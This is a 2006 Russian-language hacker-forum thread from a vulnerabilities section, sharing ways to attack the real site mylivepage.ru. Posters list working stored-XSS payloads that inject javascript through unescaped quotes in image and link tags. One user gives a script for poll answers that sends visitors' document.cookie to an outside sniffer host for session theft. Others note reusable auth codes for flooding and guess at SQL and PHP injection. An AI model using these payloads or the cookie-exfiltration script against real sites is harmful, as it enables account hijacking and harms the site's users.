mylivepage.ru активные XSS

Discussion in 'Уязвимости' started by __XT__, 19 Nov 2006.

  1. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    mylivepage.ru/
    активные XSS в форуме, комментариях, личных сообщениях и везде где можно
    оставить своё сообщение.

    Нет фильтрации `"` применив дополнительные динамические
    параметры тэга img експлуатируем XSS:
    [[Smile:"dynsrc="javascript:alert()]]
    [[Smile:"lowsrc="javascript:alert()]]
    [[Smile:"style="javascript:alert()]]
    [[Image:"lowsrc="javascript:alert()]]
    [[Image:"style="javascript:alert()]]
    [[Image:"dynsrc="javascript:alert()]]
    [[http://qwe.ru"style="background:url(javascript:alert())]]
     
    1 person likes this.
  2. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    ггг совсем забыл про ещё один параметр onerror=
    помойму=)))
    короче пипец=
    мне кажеться хсс самое малое чт отам есть....наверняка там пхп инъекций куча!
    и скуль тоже.
     
  3. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    там ещё в Опросе есть ....

    в вариантах ответа пишем..

    Code:
    <script>img = new Image(); img.src = "http://site.ru/ваш СниФ.jpg?"+document.cookie;</script>
    и куки у нас....
     
  4. Retscan

    Retscan Member

    Joined:
    17 Dec 2006
    Messages:
    25
    Likes Received:
    9
    Reputations:
    11
    Да этот mylivepage.ru даже id сессии не сохраняет и код авторизации всегда один и тот же можно использовать - можно зафлудить по самое не могу.

    Правда, слово "<script>" фильтруется полным удалием. Даже <scr<script>ipt> не помогает. Так что че-то затруднился с угоном печенья :confused:
     
    #4 Retscan, 23 Dec 2006
    Last edited: 23 Dec 2006